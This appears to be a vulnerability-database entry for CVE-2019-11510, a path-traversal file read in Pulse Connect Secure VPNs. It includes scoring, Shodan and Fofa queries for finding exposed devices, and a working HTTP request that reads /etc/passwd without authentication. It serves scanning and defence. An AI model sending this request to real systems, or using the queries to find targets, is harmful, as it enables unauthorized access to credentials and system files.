| Title | Pulse Connect Secure SSL VPN Arbitrary File Read |
|---|---|
| Author | organiccrap |
| Severity | Critical |
| Impact | An attacker can access sensitive information stored on the system, potentially leading to further compromise. |
| Remediation | Apply the latest security patches and updates provided by Pulse Secure. |
| CVSS Score | 10 |
| EPSS Score | 0.9438 |
| CVE ID | CVE-2019-11510 |
| CWE ID | CWE-22 |
| Shodan Query | http.html:"welcome.cgi?p=logo"http.title:"ivanti connect secure" |
| Fofa Query | body="welcome.cgi?p=logo"title="ivanti connect secure" |
| Tags | packetstorm cve cve2019 pulsesecure lfi kev ivanti vkev vuln |
Pulse Secure Pulse Connect Secure (PCS) 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4 all contain an arbitrary file reading vulnerability that could allow unauthenticated remote attackers to send a specially crafted URI to gain improper access.
GET /dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/ HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip
🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-11510.yaml
🦈 Packet Capture: ⬇️ Download cve-2019-11510.pcap
N/AN/A